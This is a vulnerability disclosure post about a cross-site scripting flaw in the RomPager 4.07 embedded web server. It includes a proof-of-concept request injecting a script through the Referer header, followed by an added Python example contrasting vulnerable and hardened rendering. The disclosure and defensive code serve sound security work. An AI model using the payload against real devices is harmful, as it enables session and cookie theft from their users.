Category Archives: web server

RomPager 4.07 cross-site scripting vulnerability

While testing IPs that were sources of attacks on the php-cgi vulnerability discovered by eindbazen (CVE-2012-1823), I accidentally found an XSS in the Referer header in the RomPager/4.07 embedded web server.

GET http://IP.IP.IP.IP/s0urc3_that_not_exists HTTP/1.1

..

Referer: http://dtls.com/"><script>alert(document.cookie)</script>
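A defender's view of this flaw, as an added example that is not from the original post or from RomPager's code: it assumes the error page copies the Referer value into an `href` attribute (suggested by the `">` prefix in the request above) and shows that unescaped rendering beside a hardened one. The page template and all function names are hypothetical.

```python
import html
from urllib.parse import urlsplit

# Constructed sample: the Referer value from the request shown above.
SAMPLE_REFERER = 'http://dtls.com/"><script>alert(document.cookie)</script>'

# Hypothetical error-page template with a "back" link built from the header.
PAGE = ('<html><body><h1>404 Not Found</h1>'
        '<a href="{back}">Back</a></body></html>')


def render_vulnerable(referer):
    """Assumed flawed behaviour: the header is copied into the attribute verbatim."""
    return PAGE.format(back=referer)


def safe_back_link(referer, default="/"):
    """Return an attribute-safe link target, or `default` if the header is unusable."""
    if not referer or len(referer) > 2048:
        return default
    # Reject control characters (header splitting, parser confusion).
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in referer):
        return default
    try:
        parts = urlsplit(referer)
    except ValueError:
        return default
    # Escaping alone does not neutralise javascript: or data: URLs in an href,
    # so only absolute http(s) URLs are accepted.
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return default
    # Context-appropriate output encoding for a double-quoted HTML attribute.
    return html.escape(referer, quote=True)


def render_hardened(referer):
    """Same page, with the header validated and HTML-escaped before use."""
    return PAGE.format(back=safe_back_link(referer))


if __name__ == "__main__":
    print(render_vulnerable(SAMPLE_REFERER))
    print(render_hardened(SAMPLE_REFERER))
```

The scheme allow-list matters as much as the escaping: an escaped `javascript:` URL is still a working link target.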
